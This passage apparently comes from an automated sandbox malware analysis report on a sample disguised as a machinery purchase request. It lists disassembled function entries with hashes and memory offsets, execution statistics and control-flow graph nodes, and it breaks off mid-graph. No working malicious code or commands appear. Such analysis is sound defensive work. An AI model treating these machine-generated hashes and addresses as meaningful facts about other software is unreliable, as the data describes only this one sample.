                                                          • Opcode Fuzzy Hash: f3ce036442301d14695dd1c493cab8fc1869c430b868877c6ac9e49a57da781e
                                                          • Instruction Fuzzy Hash: 7991F374E10219CFCB08CFAAC58499EFBF2FF8A310F25956AD415AB214D734AA42CF55
                                                          Function 03134480 Relevance: 2.7, Strings: 2, Instructions: 192COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1426353833.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3130000_REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: -E&@$|/@T
                                                          • API String ID: 0-3979998924
                                                          • Opcode ID: 7e6d053ec9a1a764d438c18f2095f79d831ac1199aaa50f31f542144633ed82a
                                                          • Instruction ID: 34d984b5cc5b332fec8794b217dcce00d3cd9d19f4b68a46a499bd38eada88a4
                                                          • Opcode Fuzzy Hash: 7e6d053ec9a1a764d438c18f2095f79d831ac1199aaa50f31f542144633ed82a
                                                          • Instruction Fuzzy Hash: 85810374E10219CFCB08CFA9C58499EFBF2FF8A310F25956AD415AB225D734AA42CF50
                                                          Function 03135308 Relevance: 1.4, Strings: 1, Instructions: 151COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1426353833.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3130000_REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: JGO
                                                          • API String ID: 0-1117171264
                                                          • Opcode ID: 33af6a3e9b5722a2ce98bc528f7d7d151893ecd83091fcb57865b0d0fe2c8059
                                                          • Instruction ID: 87e67c735234d36b2c23a96cf187fa58158c9d8a464d70b87fb4abe79d9c88a9
                                                          • Opcode Fuzzy Hash: 33af6a3e9b5722a2ce98bc528f7d7d151893ecd83091fcb57865b0d0fe2c8059
                                                          • Instruction Fuzzy Hash: 12611AB4D04209DFCB08CFAAD9815AEFBF2BF4A740F14806AD415B7250D7789A41CFA1
                                                          Function 03135B38 Relevance: 1.4, Strings: 1, Instructions: 108COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1426353833.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3130000_REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: h!)
                                                          • API String ID: 0-4194536186
                                                          • Opcode ID: 2b30789f22350429ca8a4e4e6017d773a2f32217e24eba6ac67de1254e36970d
                                                          • Instruction ID: d8dbbbaab513cc725efb0ea4c45f851982b69cff013623ef3464a59b9ff4245e
                                                          • Opcode Fuzzy Hash: 2b30789f22350429ca8a4e4e6017d773a2f32217e24eba6ac67de1254e36970d
                                                          • Instruction Fuzzy Hash: 9041FAB0E0560ADFDB08CFAAC5405AEFBF2FF89310F24D069C415B7214D7349A458BA5
                                                          Function 03135B29 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1426353833.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3130000_REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: h!)
                                                          • API String ID: 0-4194536186
                                                          • Opcode ID: 3d5a8dcba66588c91998439f788e00183596b76384ec1ac1a744d185911bf025
                                                          • Instruction ID: 353210cb45595b1715047ef0b7ad996eb14a19a9ec12d4b7313653a1eecaf5a3
                                                          • Opcode Fuzzy Hash: 3d5a8dcba66588c91998439f788e00183596b76384ec1ac1a744d185911bf025
                                                          • Instruction Fuzzy Hash: 1241E8B4E0564A9FDB08CFAAC5815AEFBF2FF89310F24D069C405B7218D7349A458BA5
                                                          Function 0A79D1B0 Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1451441187.000000000A790000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A790000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_a790000_REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Xai
                                                          • API String ID: 0-3495335054
                                                          • Opcode ID: 31ad1aef4fb1a844bfe7b7919db41d32d8ba876c1d5dae2fa7918f356f621026
                                                          • Instruction ID: 08db3544970fc3e9c98e64d01e02506870e38aa5fe162657b14e1e2a53df6c06
                                                          • Opcode Fuzzy Hash: 31ad1aef4fb1a844bfe7b7919db41d32d8ba876c1d5dae2fa7918f356f621026
                                                          • Instruction Fuzzy Hash: D82136B1E106199BEB58CFABD94169EFBF7AFC9310F14C13AD418B7215DB304A068B90
                                                          Function 0A79D1A0 Relevance: 1.3, Strings: 1, Instructions: 60COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1451441187.000000000A790000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A790000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_a790000_REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Xai
                                                          • API String ID: 0-3495335054
                                                          • Opcode ID: ee9cd60a84a0e27d04d5e41d0032a7dbf2afa7784d564ef1d6468fca15b1e40c
                                                          • Instruction ID: a0bbc5e1856cab8633b6fd94a59ee55e42bfda5c5b0fd1d163e62bffff735699
                                                          • Opcode Fuzzy Hash: ee9cd60a84a0e27d04d5e41d0032a7dbf2afa7784d564ef1d6468fca15b1e40c
                                                          • Instruction Fuzzy Hash: 832158B1E106188BEB58CF6BD84169EFBF3AFC9300F14C07AD408B7215DB3049468B55
                                                          Function 09E899C0 Relevance: .3, Instructions: 312COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1450462274.0000000009E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_9e80000_REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 507212df4e02d4ea4e90372138c2cf88e7d8842de7b42254083952c8bc24a81b
                                                          • Instruction ID: aaa68b64217d9ebce2f0b5ff26b90e90741020c61cfdab204095d4264709f598
                                                          • Opcode Fuzzy Hash: 507212df4e02d4ea4e90372138c2cf88e7d8842de7b42254083952c8bc24a81b
                                                          • Instruction Fuzzy Hash: 78E1E974E002198FDB14DFA9C580AAEFBB2FF89305F248169D419AB356D731AD41CF64
                                                          Function 09E8BA70 Relevance: .3, Instructions: 312COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1450462274.0000000009E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_9e80000_REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1556e93fffc06a0a93b5f3f77c47ea3cc95a036a004f2912d7be654ec488b740
                                                          • Instruction ID: 6baf71091c72e56382cf31dfffdf950a02f7544972885a1435d2370b99242e9d
                                                          • Opcode Fuzzy Hash: 1556e93fffc06a0a93b5f3f77c47ea3cc95a036a004f2912d7be654ec488b740
                                                          • Instruction Fuzzy Hash: 52E1FC74E002198FDB14DFA9C580AAEFBB2FF89305F248169D419AB355D731AD41CFA0
                                                          Function 09E89DF8 Relevance: .3, Instructions: 312COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1450462274.0000000009E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_9e80000_REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 93d51dbd95f67f7b0bd8e7a21d856a0ad866176ba76974b298911aedc91dee25
                                                          • Instruction ID: 18218b3284e2ebf792947c1e3192613d337122918cafb462ae67130b09cccd46
                                                          • Opcode Fuzzy Hash: 93d51dbd95f67f7b0bd8e7a21d856a0ad866176ba76974b298911aedc91dee25
                                                          • Instruction Fuzzy Hash: 13E1EB74E102198FDB14DFA9C580AAEFBB2FF89305F24816AD418AB355D735AD41CFA0
                                                          Function 09E8A230 Relevance: .3, Instructions: 312COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1450462274.0000000009E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_9e80000_REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: aaa14f3e322e949d1802634190990093bfceaeade6d6d0d299ac28c5fd5e6e5a
                                                          • Instruction ID: fff0ceced1df5baae1d871f406f89312924f5282a4614b58a1a2cee5868497f2
                                                          • Opcode Fuzzy Hash: aaa14f3e322e949d1802634190990093bfceaeade6d6d0d299ac28c5fd5e6e5a
                                                          • Instruction Fuzzy Hash: 07E1FB74E012198FDB14DFA9C5809AEFBB2FF89305F24816AD419AB355D731AD41CF60
                                                          Function 09E8B638 Relevance: .3, Instructions: 312COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1450462274.0000000009E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_9e80000_REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 08dfb0f2be34dea8b3e45345bb48d7cafd449c397dd2d53a42152ebb4b643319
                                                          • Instruction ID: f9d2c5c254888f0ca4d63c9f2222c5523bfc22d1c894231fcab9b664e2558fcf
                                                          • Opcode Fuzzy Hash: 08dfb0f2be34dea8b3e45345bb48d7cafd449c397dd2d53a42152ebb4b643319
                                                          • Instruction Fuzzy Hash: AEE1F974E002198FDB14DFA9C580AAEFBB2FF89305F248169D819AB355D731AD41CFA0
                                                          Function 03131698 Relevance: .3, Instructions: 254COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1426353833.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3130000_REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 35df01d54f65a9b57046c95d6ce496896ff3058a7379433ab3efaa0d58f60bf2
                                                          • Instruction ID: 9b51d9bcc519d924c156af668e39b1a9bf1e562e85a479cdca590151fc6852bc
                                                          • Opcode Fuzzy Hash: 35df01d54f65a9b57046c95d6ce496896ff3058a7379433ab3efaa0d58f60bf2
                                                          • Instruction Fuzzy Hash: 1AB1F974E1221E9FDB04EFA9D880ADEBBB2FF89300F109665D415AB355DB30A945CF81
                                                          Function 031320C9 Relevance: .2, Instructions: 180COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1426353833.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3130000_REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 81c633e7f734f82098a7a29be0887b555321289901834ad32a08865abb2a22ff
                                                          • Instruction ID: ff3abce5ebd4e9a5a4f867a484c1a79d9651700dc9c022adb43bd2b57c67b896
                                                          • Opcode Fuzzy Hash: 81c633e7f734f82098a7a29be0887b555321289901834ad32a08865abb2a22ff
                                                          • Instruction Fuzzy Hash: 377129B5E0520ADFCB08DF99D5819EEFBB1FB8A310F149529E515AB314D3349982CF90
                                                          Function 031358E0 Relevance: .2, Instructions: 161COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1426353833.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3130000_REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8080758d93791bb6f2f4b13726c5c617cead2b0144e89f3a708fe46d7eb66d43
                                                          • Instruction ID: d4b324d19b9542dc634239bc232301ff8e8a353ec223e8baa751fa2968b851f5
                                                          • Opcode Fuzzy Hash: 8080758d93791bb6f2f4b13726c5c617cead2b0144e89f3a708fe46d7eb66d43
                                                          • Instruction Fuzzy Hash: A361C3B4E156199FDB08CFA9C5809DEFBF2FB8A220F24946AD415BB314D3349A41CB64
                                                          Function 03135018 Relevance: .2, Instructions: 160COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1426353833.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3130000_REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 46eaf027a0b886081a0eb1e7e9f8ad38e48f49f69b133a3bed8bbdca4f6e4cb5
                                                          • Instruction ID: 6b5e3e493608a883a5c48b2dbb1dd7bafeeeb0aefa45075d8ac29649feb3744c
                                                          • Opcode Fuzzy Hash: 46eaf027a0b886081a0eb1e7e9f8ad38e48f49f69b133a3bed8bbdca4f6e4cb5
                                                          • Instruction Fuzzy Hash: 6971C4B4E1020ADFCB14CF99D5808AEFBB2FF4A710F25955AD415AB314D7349982CFA0
                                                          Function 031358D0 Relevance: .2, Instructions: 159COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1426353833.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3130000_REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 220e4022a03e95c5627167557adaf5de368383d45a0184fcb62858a49760df39
                                                          • Instruction ID: 48dbba02ef5b6e24b612962fba000107c0c0ffdd1f479beb2b06957afe1e5ec6
                                                          • Opcode Fuzzy Hash: 220e4022a03e95c5627167557adaf5de368383d45a0184fcb62858a49760df39
                                                          • Instruction Fuzzy Hash: 3561C375E1561A8FDB08CFA9C5809EEFBF2FF8A220F24946AD415B7314D3349A41CB64
                                                          Function 03135008 Relevance: .2, Instructions: 155COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1426353833.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3130000_REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fa8a34c22273e3cdfe830b5e8505f237a8501395fee51da0e3ca2b91631eb26a
                                                          • Instruction ID: 2802c0ac820f6cde7f26180402e989b4456f9d4da295d84cbe6f6c9d5e33a973
                                                          • Opcode Fuzzy Hash: fa8a34c22273e3cdfe830b5e8505f237a8501395fee51da0e3ca2b91631eb26a
                                                          • Instruction Fuzzy Hash: CB61F8B4D0420ADFCB04CFA9C5819AEFBB2FF4A710F19855AD415AB304D734A982CFA1
                                                          Function 0313569A Relevance: .1, Instructions: 114COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1426353833.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3130000_REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1fad0bf11fc58e7bab48f2b56907847e1a04b54340db2f655493e6d6a2778de4
                                                          • Instruction ID: 0a4854f5ae8f4d639688af9d83ce203f0d0fcd656f09309a55fcfae893ebb1aa
                                                          • Opcode Fuzzy Hash: 1fad0bf11fc58e7bab48f2b56907847e1a04b54340db2f655493e6d6a2778de4
                                                          • Instruction Fuzzy Hash: 6441EBB4E0460A9FDB08CFAAC4815AEFBF2EF8A310F24D56AC415F7254D7349A458F94
                                                          Function 031356A8 Relevance: .1, Instructions: 113COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1426353833.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3130000_REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f33ecfa09fe4e3c84ee02e6d1f8c32880cfc559e4c3ba35cd3b3b9d3f4f737f8
                                                          • Instruction ID: c92e17d354dd6430a5fb9d7722bdf1ba02771694814e11d934fb652a6f87de34
                                                          • Opcode Fuzzy Hash: f33ecfa09fe4e3c84ee02e6d1f8c32880cfc559e4c3ba35cd3b3b9d3f4f737f8
                                                          • Instruction Fuzzy Hash: E141E9B4E0460A8FDB08CFAAC4805AEFBF2FF8A310F24D56AC415B7214D7349A458F94

                                                          Execution Graph

                                                          Execution Coverage:11.3%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:24
                                                          Total number of Limit Nodes:5
                                                          execution_graph 23643 f90848 23645 f9084e 23643->23645 23644 f9091b 23645->23644 23648 f914a8 23645->23648 23653 f9138f 23645->23653 23649 f913a6 23648->23649 23650 f914a0 23649->23650 23651 f914a8 GlobalMemoryStatusEx 23649->23651 23659 f97fa0 23649->23659 23650->23645 23651->23649 23654 f9135b 23653->23654 23656 f91393 23653->23656 23654->23645 23655 f914a0 23655->23645 23656->23655 23657 f97fa0 GlobalMemoryStatusEx 23656->23657 23658 f914a8 GlobalMemoryStatusEx 23656->23658 23657->23656 23658->23656 23660 f97faa 23659->23660 23661 f97fc4 23660->23661 23664 654faf0 23660->23664 23668 654fadf 23660->23668 23661->23649 23666 654fb05 23664->23666 23665 654fd1a 23665->23661 23666->23665 23667 654fd30 GlobalMemoryStatusEx 23666->23667 23667->23666 23670 654fb05 23668->23670 23669 654fd1a 23669->23661 23670->23669 23671 654fd30 GlobalMemoryStatusEx 23670->23671 23671->23670

                                                          Executed Functions

                                                          Function 06545670 Relevance: 1.8, Strings: 1, Instructions: 600COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 650 6545670-654568d 651 654568f-6545692 650->651 652 6545694-65456a9 651->652 653 65456ae-65456b1 651->653 652->653 654 65456c0-65456c3 653->654 655 65456b3-65456b9 653->655 659 65456c5-65456c8 654->659 660 65456cd-65456d0 654->660 657 65456f3-65456fd 655->657 658 65456bb 655->658 665 6545704-6545706 657->665 658->654 659->660 661 65456d2-65456d5 660->661 662 65456da-65456dd 660->662 661->662 663 65456ee-65456f1 662->663 664 65456df-65456e3 662->664 663->657 668 654570b-654570e 663->668 666 65456e9 664->666 667 654583a-6545847 664->667 665->668 666->663 669 6545710-654572d 668->669 670 6545732-6545735 668->670 669->670 671 6545737-6545744 670->671 672 6545749-654574c 670->672 671->672 673 654574e-6545764 672->673 674 6545769-654576c 672->674 673->674 677 654576e-6545777 674->677 678 6545778-654577b 674->678 680 6545783-6545786 678->680 681 654577d-654577e 678->681 683 6545788-654578e 680->683 684 6545799-654579c 680->684 681->680 683->659 685 6545794 683->685 686 65457d4-65457d7 684->686 687 654579e-65457a4 684->687 685->684 688 65457e6-65457e9 686->688 689 65457d9-65457df 686->689 690 6545848-6545873 687->690 691 65457aa-65457b2 687->691 688->655 693 65457ef-65457f2 688->693 689->687 692 65457e1 689->692 701 654587d-6545880 690->701 691->690 694 65457b8-65457c5 691->694 692->688 697 65457f4-65457f6 693->697 698 65457f9-65457fc 693->698 694->690 695 65457cb-65457cf 694->695 695->686 697->698 699 6545812-6545815 698->699 700 65457fe-654580d 698->700 702 6545817-654581e 699->702 703 6545823-6545826 699->703 700->699 704 6545891-6545894 701->704 705 6545882-654588c 701->705 702->703 703->689 707 6545828-654582a 703->707 708 6545896-654589d 704->708 709 65458a8-65458ab 704->709 705->704 710 6545831-6545834 707->710 711 654582c 707->711 713 65458a3 708->713 714 654595a-6545961 708->714 715 65458b5-65458b8 709->715 716 65458ad-65458b4 709->716 710->651 710->667 711->710 713->709 717 65458d0-65458d3 715->717 718 65458ba-65458cb 715->718 719 65458d5-65458d9 717->719 720 65458f1-65458f4 717->720 718->717 722 6545962-6545970 719->722 723 65458df-65458e7 719->723 724 65458f6-65458fa 720->724 725 654590e-6545911 720->725 738 6545972-654599a 722->738 739 654599b-654599d 722->739 723->722 726 65458e9-65458ec 723->726 724->722 727 65458fc-6545904 724->727 728 6545913-6545917 725->728 729 654592b-654592e 725->729 726->720 727->722 733 6545906-6545909 727->733 728->722 734 6545919-6545921 728->734 730 6545930-6545934 729->730 731 6545948-654594a 729->731 730->722 735 6545936-654593e 730->735 736 6545951-6545954 731->736 737 654594c 731->737 733->725 734->722 740 6545923-6545926 734->740 735->722 741 6545940-6545943 735->741 736->701 736->714 737->736 738->739 742 654599e-65459a1 739->742 740->729 741->731 743 65459a3-65459b4 742->743 744 65459bf-65459c2 742->744 750 6545d1d-6545d30 743->750 751 65459ba 743->751 745 65459c8-6545b5c 744->745 746 6545cab-6545cae 744->746 801 6545c95-6545ca8 745->801 802 6545b62-6545b69 745->802 747 6545cb0-6545cb7 746->747 748 6545cbc-6545cbf 746->748 747->748 752 6545cc1-6545cd2 748->752 753 6545cdd-6545ce0 748->753 751->744 762 6545cd8 752->762 763 6545d6b-6545d7c 752->763 755 6545ce2-6545ce7 753->755 756 6545cea-6545ced 753->756 755->756 760 6545d07-6545d0a 756->760 761 6545cef-6545d00 756->761 764 6545d0c-6545d13 760->764 765 6545d18-6545d1b 760->765 761->747 770 6545d02 761->770 762->753 763->747 774 6545d82 763->774 764->765 765->750 768 6545d33-6545d36 765->768 768->745 769 6545d3c-6545d3f 768->769 769->745 772 6545d45-6545d48 769->772 770->760 775 6545d66-6545d69 772->775 776 6545d4a-6545d5b 772->776 777 6545d87-6545d89 774->777 775->763 775->777 776->747 783 6545d61 776->783 779 6545d90-6545d93 777->779 780 6545d8b 777->780 779->742 781 6545d99-6545da2 779->781 780->779 783->775 803 6545c1d-6545c24 802->803 804 6545b6f-6545b92 802->804 803->801 805 6545c26-6545c59 803->805 813 6545b9a-6545ba2 804->813 817 6545c5e-6545c8b 805->817 818 6545c5b 805->818 815 6545ba4 813->815 816 6545ba7-6545be8 813->816 815->816 826 6545c00-6545c11 816->826 827 6545bea-6545bfb 816->827 817->781 818->817 826->781 827->781
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1489439937.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_6540000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $
                                                          • API String ID: 0-3993045852
                                                          • Opcode ID: 3d6599f7b34241fa5113c76884e8b7233cb70c6b6eef2180d7aa5f565e1e39b6
                                                          • Instruction ID: 04e20115bf653734a31895ba6271ab39d41aa3c2e00a7a695a858559ed9548ea
                                                          • Opcode Fuzzy Hash: 3d6599f7b34241fa5113c76884e8b7233cb70c6b6eef2180d7aa5f565e1e39b6
                                                          • Instruction Fuzzy Hash: 3E22D175E002099FDF64EBA4C4846AEBBB2FF85324F2084B9E455AB354EA35DC45CB90
                                                          Function 06542429 Relevance: 1.0, Instructions: 1016COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1489439937.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_6540000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 91ce65636137515125266e8207402fd4e6a2692e5f201c2de80703e692d59461
                                                          • Instruction ID: 0043f19769d969e06ca45c1adc26858d39e41bc02b475bd3c4a1b2389810870b
                                                          • Opcode Fuzzy Hash: 91ce65636137515125266e8207402fd4e6a2692e5f201c2de80703e692d59461
                                                          • Instruction Fuzzy Hash: B1924534E002148FDB64EB68C588A9DB7F2FB84319F54C4A9E409AB365DB75ED81CF90
                                                          Function 065466C0 Relevance: .8, Instructions: 819COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1489439937.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_6540000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e33d02ba83b01106b3cedd520f2327c1f50305d984f0b24e02010da98ad156df
                                                          • Instruction ID: 4da508a8db3199eb6532bc657c5cec1097fa8938d8701b4a2ae10f3ba92fe0c7
                                                          • Opcode Fuzzy Hash: e33d02ba83b01106b3cedd520f2327c1f50305d984f0b24e02010da98ad156df
                                                          • Instruction Fuzzy Hash: 89627D34A00205CFDB54EB69D994BADB7F2FF89318F1484A9E406AB355DB35EC41CB90
                                                          Function 0654C238 Relevance: .6, Instructions: 650COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2485 654c238-654c25a 2486 654c25c-654c25f 2485->2486 2487 654c261-654c267 2486->2487 2488 654c279-654c27c 2486->2488 2489 654c26d-654c274 2487->2489 2490 654c5da-654c60d 2487->2490 2491 654c29d-654c2a0 2488->2491 2492 654c27e-654c298 2488->2492 2489->2488 2500 654c60f-654c612 2490->2500 2493 654c2a2-654c2a8 2491->2493 2494 654c2af-654c2b2 2491->2494 2492->2491 2493->2487 2496 654c2aa 2493->2496 2497 654c2b4-654c2c3 2494->2497 2498 654c2ce-654c2d1 2494->2498 2496->2494 2512 654c557-654c55a 2497->2512 2513 654c2c9 2497->2513 2501 654c2d3-654c2d4 2498->2501 2502 654c2d9-654c2dc 2498->2502 2503 654c614-654c62d 2500->2503 2504 654c632-654c635 2500->2504 2501->2502 2506 654c516-654c51f 2502->2506 2507 654c2e2-654c2e5 2502->2507 2503->2504 2510 654c637-654c650 2504->2510 2511 654c65d-654c660 2504->2511 2508 654c434-654c43d 2506->2508 2509 654c525 2506->2509 2514 654c2e7-654c30c 2507->2514 2515 654c311-654c314 2507->2515 2508->2490 2516 654c443-654c44a 2508->2516 2517 654c52a-654c52d 2509->2517 2566 654c652-654c65c 2510->2566 2567 654c6bf-654c6cb 2510->2567 2522 654c662-654c67e 2511->2522 2523 654c683-654c686 2511->2523 2521 654c55f-654c562 2512->2521 2513->2498 2514->2515 2519 654c335-654c338 2515->2519 2520 654c316-654c330 2515->2520 2525 654c44f-654c452 2516->2525 2526 654c537-654c53a 2517->2526 2527 654c52f-654c532 2517->2527 2531 654c358-654c35b 2519->2531 2532 654c33a-654c353 2519->2532 2520->2519 2533 654c564-654c580 2521->2533 2534 654c585-654c588 2521->2534 2522->2523 2528 654c693-654c696 2523->2528 2529 654c688-654c692 2523->2529 2535 654c454-654c464 2525->2535 2536 654c469-654c46c 2525->2536 2537 654c552-654c555 2526->2537 2538 654c53c-654c54d 2526->2538 2527->2526 2543 654c6ad-654c6af 2528->2543 2544 654c698-654c6a6 2528->2544 2546 654c384-654c387 2531->2546 2547 654c35d-654c37f 2531->2547 2532->2531 2533->2534 2540 654c5b3-654c5b6 2534->2540 2541 